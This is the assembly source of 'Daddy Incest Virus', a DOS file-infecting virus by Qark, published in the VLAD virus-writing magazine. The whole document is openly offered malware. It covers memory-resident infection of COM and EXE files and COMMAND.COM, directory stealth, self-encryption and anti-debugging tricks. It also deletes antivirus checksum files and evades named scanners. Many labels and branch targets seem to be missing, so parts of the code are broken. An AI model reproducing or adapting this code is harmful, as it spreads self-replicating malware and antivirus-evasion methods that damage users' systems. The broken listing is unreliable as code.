Virus Labs & Distribution
VLAD #1 - Daddy Source
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; � Daddy Incest Virus �
; ���������������������������������������������������������������
; Another member of the Incest Family.
; TSR. COMMAND.COM infecting. Directory stealth.
; COM and EXE infection. Good Encryption.
; (We had OVL infection but it crashes!)
; Deletes all those CRC checking files.
; Avoids TBScan/F-prot.
; Since the final release of this virus I have learnt many new optimisations
; and coding techniques from Terminator Z. Look for these in the next issue
; of the VLAD magazine.
; This is the best virus in the incest family by far. Please enjoy.
org 0
call crap_ret ;Get IP
return_here: ;Where the ret will return.
mov word ptr cs:[si+offset quit], 20cdh
quit: ;Put an 'int 20h' here.
;Because of DOS's prefetch
;queue, it will glide over
;it, while f-prot/debug etc
;will stop here.
;Put this in last because
;it really fucks up debug.
;Also, it fucks TBClean.
cmp byte ptr cs:[si+exe_com],1
je com_start
;Exe shit in here.
mov word ptr cs:[si+offset orig_sp],sp
mov word ptr cs:[si+offset orig_ss],ss
mov dx,cs
mov ss,dx
mov sp,si
add sp,offset stackend
call unencrypt
call install_tsr
jmp exe_end ;Jump down so that bit is inside
;the encryption.
unencrypt proc near ;Setup for unencryption.
mov al,byte ptr cs:[si+offset encryptor]
push si
add si,offset enc_start
call encrypt
pop si
unencrypt endp
call unencrypt
call install_tsr
;Restore orig 3 bytes.
add si,offset old3
mov di,100h
mov cx,3
rep movsb
mov si,0ffh
inc si
push si
;add es,10h
mov dx,es
add dx,10h
;add original offset of cs in paragraphs.
add word ptr cs:[si+jump+2],dx
;now you have your cs to jump to
;move it where we want it then jump to it.
mov sp,word ptr cs:[si+orig_sp]
mov ss,word ptr cs:[si+orig_ss]
xor dx,dx
xor si,si
db 0eah ;JMPF
jump dw 0
dw 0
install_TSR proc near
;Should work with both EXE's and COM's.
push ax
push bx
push cx
push dx
push ds
push es
;Test to see whether daddy is home.
mov ah,61h ;Daddy!
mov di,'DA'
mov bx,'D'
int 21h
;do compares here...
cmp cx,'DA'
jne go_tsr
jmp jend
xor ax,ax ;Segment 0... where the
mov es,ax ;interrupt table lurks...
mov ax,word ptr es:[132] ;Put int21 in i21...
mov word ptr cs:[si+offset i21],ax
mov word ptr cs:[si+offset int21_2],ax
mov ax,word ptr es:[134]
mov word ptr cs:[si+offset i21 + 2],ax
mov word ptr cs:[si+offset int21_2 + 2],ax
;Check for incest family marker here...
mov ah,61h ;Sis!(ter)
mov di,'IN'
int 21h
cmp di,'NI'
jne not_incest
mov word ptr cs:[si+offset int21_2],cx
mov word ptr cs:[si+offset int21_2+2],dx
mov ax,ds
dec ax
mov es,ax ;MCB segment.
cmp byte ptr es:[0],5ah ;'Z' - last MCB.
jne jend
sub word ptr es:[3],150
sub word ptr es:[12h],150 ;150*16 bytes less memory.
mov ax,es:[12h] ;find virus MCB segment
mov es,ax ;es=virus MCB segment
mov byte ptr es:[0],5ah ;mark as last in MCB chain
mov word ptr es:[1],8 ;DOS now owns this
mov word ptr es:[3],2384 ;set the size of segment
inc ax ;ax=virus segment
mov es,ax ;es=virus segment
mov di,offset entry
mov cx,length ;virus size
push cs
pop ds
push si
rep movsb ;copy virus to TOM
pop si
mov bx,es
xor ax,ax ;es = segment of vector table
mov es,ax
mov ax,offset infection ;change vector table to point
mov word ptr es:[132],ax ;to our virus...
mov word ptr es:[134],bx
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
install_TSR endp
;###### Here is the Details ######
Virus_Name db '[Incest Daddy]',0
Author db 'by Qark/VLAD',0
old3 db 0cdh,20h,0 ;Storage for the bytes in com files
infection proc far
cmp ah,4bh
je test_file
cmp ah,43h
je test_file
cmp ah,56h
je test_file
cmp ax,6c00h
je test_file
cmp ah,3dh
je test_file
cmp ah,11h
je dir_listing
cmp ah,12h
je dir_listing
;insert residency test here...
cmp ah,61h
jne not_testing
cmp di,'DA'
jne chk4incest
cmp bx,'D'
jne not_testing
mov cx,'DA' ;Return test parameters.
cmp di,'IN'
jne not_testing
mov di,'NI' ;Incest Marker...
mov cx,word ptr cs:[int21_2]
mov dx,word ptr cs:[int21_2 + 2] ;Pass original int21h out.
jmp dir_stealth
jmp far_tsr_end
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
cmp ah,6ch
jne no_fix_6c
mov dx,si
cld ;Clear Direction Flag.
mov si,dx ;Filename being executed.
dec si
inc si
cmp byte ptr ds:[si],0 ;Find end of ASCIIZ name.
jne find_ascii_z
sub si,4 ;Length of '.EXE'
cmp word ptr ds:[si],'E.'
je exe_found1
jmp cmp_com
cmp word ptr ds:[si+2],'EX' ;Test for '.EXE'
je exe_found2
cmp word ptr ds:[si],'C.'
je com_found1
jmp filename_exit
cmp word ptr ds:[si+2],'MO' ;Test for '.COM'
jne filename_exit
mov byte ptr cs:exe_com,1
jmp do_file
jmp f_pop_exit
mov byte ptr cs:[exe_com],0
mov ax,3d02h
call int21h
jc filename_exit
mov bx,ax
xor ax,ax
mov es,ax
mov ax,word ptr es:[144]
mov word ptr cs:[i24],ax
mov ax,word ptr es:[146]
mov word ptr cs:[i24+2],ax ;Save int24h
mov word ptr es:[144],offset int24h
mov es:[146],cs ;Cool handler!
push dx ;Save the path for l8r
mov ax,5700h
call int21h ;Save the file date for
;later use.
mov cs:filetime,cx ;File date and Time.
mov cs:filedate,dx
cmp cx,dx
jne infect
pop dx ;Pop this or everything will
;stuff up.
jmp far_close_exit
pop dx ;DS:DX = path of infectee.
call del_crc_files ;Delete some CRC checkers.
;Com and Exe go their separate ways...
cmp byte ptr exe_com,0
je exe_infection
jmp com_infection
exe_infection: ;My Exe infection code is lame!!!!
;read in header
mov ah,3fh
mov cx,1ah
mov dx,offset header ;Read the header in here.
call int21h
mov si,offset header ;Index to the header.
mov cx,word ptr [si] ;MZ header.
add ch,cl ;Add M+Z = 167.
cmp ch,167
je good_exe
jmp far_close_exit
;convert headersize to bytes
mov ax,word ptr [si+8]
mov cl,4
shl ax,cl ;Mul by 16 - paragraphs
mov word ptr hsize,ax ;Header size in bytes.
;save original cs & ip for later use
mov ax,word ptr [si+14h]
mov word ptr jump,ax
mov ax,word ptr [si+16h]
mov word ptr jump+2,ax
;end of file
mov al,2 ;Go to EOF.
call lseek
;get file length
;convert length to paragraph/offset form
sub ax,word ptr hsize
sbb dx,0
mov cx,10h
div cx
;write to header
mov word ptr [si+14h],dx ;New IP/CS
mov word ptr [si+16h],ax
;fix up encryption
call encrypt_setup
;write virus to eof
mov ah,40h
mov cx,length ;Virus Size
mov dx,offset stackend
call int21h
jc far_close_exit
;get new file length
mov al,2 ;EOF again.
call lseek
;work out number of pages and write to header
push dx ;Save them.
push ax
mov cx,512 ;Page Size = 512.
div cx
inc ax
mov word ptr [si+4],ax ; new file size
pop ax
pop dx
sub ax,word ptr hsize
sbb dx,0
mov cx,512
div cx
mov word ptr [si+2],dx ;Size of last page.
mov al,0 ;Start of file.
call lseek
mov ah,40h ;Write header.
mov dx,offset header
mov cx,1ah
call int21h
mov ax,5701h ;Restore file time.
mov cx,filedate
mov dx,filedate
call int21h
mov ah,3eh ;Close file.
call int21h
xor ax,ax
mov es,ax ;Interrupt vector table at
mov ax,word ptr cs:[i24] ;Segment 0.
mov es:[144],ax
mov ax,word ptr cs:[i24+2]
mov es:[146],ax ;Reset int 24h
pop di
pop si
pop es
pop ds
pop dx ;Restore everything.
pop cx
pop bx
pop ax
db 0eah ;Self modifying code here.
i21 dd 0
mov ah,3fh
mov cx,3 ;CX = no. to read
mov dx,offset old3 ;Read into old3
call int21h ;Read 1st three bytes
mov al,02h ;Seek to end of file
call lseek ;End of file
push ax
call encrypt_setup
mov dx,offset stackend ;Address of virus
mov cx,length ;Length of virus
mov ah,40h
call int21h ;Write virus to file
jc far_close_exit
xor al,al ;Seek to start
call lseek ;Start of file
pop ax ;Restore file length
sub ax,3
mov cs:[jumpbit+1],ax
mov dx,offset jumpbit ;Address of start
mov ah,40h
mov cx,3 ;Write three bytes
call int21h ;Write jump for
;file newly infected.
jmp time_exit
jumpbit db 0e9h,0,0
hsize dw 0 ;Header size in bytes.
filedate dw 0 ;File date.
filetime dw 0 ;File time.
;This bit means that when you do a 'dir' there is no change in
;file size.
call int21h ;Call the interrupt
cmp al,0 ;straight off.
jne end_of_dir
push es
push ax ;Save em.
push bx
push si
mov ah,2fh ;Get DTA address.
int 21h
mov si,bx
cmp byte ptr es:[si],0ffh ;Extended FCB ?
jne not_extended
add si,7 ;Add the extra's.
mov cx,word ptr es:[si+17h] ;Move time and date.
mov ax,word ptr es:[si+19h]
cmp ax,cx ;Are time and date equal ?
jne dir_pop
sub word ptr es:[si+1dh],length ;Subtract the file length.
sbb word ptr es:[si+1fh],0
pop si
pop bx
pop ax
pop es
iret ;Return to caller.
;Sets up the encryption for the TSR.
encrypt_setup proc near
mov word ptr quit,802eh ;Move the bytes changed by
;the anti-debugging code
;back to the start.
cmp byte ptr encryptor,0ffh
jne not_zero
inc byte ptr encryptor ;Make sure it's not zero.
inc byte ptr encryptor ;Change the encryptor to fuck
mov al,byte ptr encryptor ;up all those signature
push si
push cs
pop es
mov si,offset entry
mov di,offset stackend
mov cx,length
rep movsb
mov si,offset stackend + offset enc_start
call encrypt
pop si
Encrypt_Setup endp
Del_CRC_Files proc near
; Deletes AV CRC checking files. This saves the user a heap of disk space.
; Aren't we just good guys ?! :)
push cs ;ES=CS
pop es
add si,4 ;SI=End of ASCIIZ name.
mov cx,si
sub cx,dx ;CX=Length of string.
mov si,dx ;SI=Start of ASCIIZ
mov di,offset stackseg ;Put it all in stackseg
rep movsb ;Move it!
push cs ;DS=CS
pop ds
mov si,offset file1 ;First file.
cmp byte ptr [di],'\' ;Looking for a slash.
je add_name ;Found a slash!
cmp di,offset stackseg ;Slashless :(
je no_slash
dec di
jmp find_path
mov word ptr stackseg,'\.' ;Put or own slash in...
inc di ;Default directory.
inc di
mov cx,13 ;Move our filename in.
rep movsb
mov dx,offset stackseg ;Delete it!
mov ah,41h
call int21h
cmp si,offset lseek ;Finished deleting.
jne find_path
Del_CRC_Files endp
file1 db 'ANTI-VIR.DAT',0 ;Get rid of these pests.
file2 db 'MSAV.CHK',0,0,0,0,0
file3 db 'CHKLIST.CPS',0,0
file4 db 'CHKLIST.MS',0,0,0
LSeek proc near
; Al = 0 = Start of file |||| Al = 2 = End of file
mov ah,42h
xor cx,cx
xor dx,dx
call int21h
Lseek endp
int24h proc near ;Stops embarassing error messages on write protected
mov al,3
int24h endp
i24 dd 0 ;Original int24h
int21h proc near ;False int21h
db 9ah ;'Call far ptr' opcode.
int21_2 dd 0 ;Save second int 21h here...
int21h endp
;This routine must remain outside of the encryption.
crap_ret proc near ;Crappy 'Ret' routine to get IP.
mov bp,sp
mov si,word ptr ss:[bp]
sub si,offset return_here
xor bp,bp
crap_ret endp
encrypt proc near
;SI = Offset of bit to be encrypted
;AL = Encryptor
push cx
mov cx,offset enc_end - offset enc_start
ror al,1
neg al
xor byte ptr cs:[si],al
inc si
loop enc_loop
pop cx
encrypt endp
encryptor db 0
exe_com db 1 ;Exe or com file ? 1 = com
orig_sp dw 0
orig_ss dw 0
header db 1ah dup (0)
;The temporary stack.
stackseg db 100 dup (0)
stackend db 0
length equ offset header ;The length of the virus.
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